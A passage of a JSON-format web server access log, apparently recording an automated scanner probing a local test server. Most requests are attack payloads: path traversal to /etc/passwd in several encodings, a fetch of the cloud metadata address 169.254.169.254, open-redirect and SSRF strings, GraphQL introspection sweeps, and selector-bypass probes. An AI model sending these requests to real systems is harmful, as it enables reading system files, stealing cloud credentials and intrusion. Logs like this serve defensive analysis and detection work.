+0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"6.388","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:08 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.058","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.067","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.062","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:09 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:@example.com%5C@WillBeReplaced.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.062","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.060","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:10 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.069","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.085","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://www.%5C.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5C/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http://127.0.0.1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.073","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} 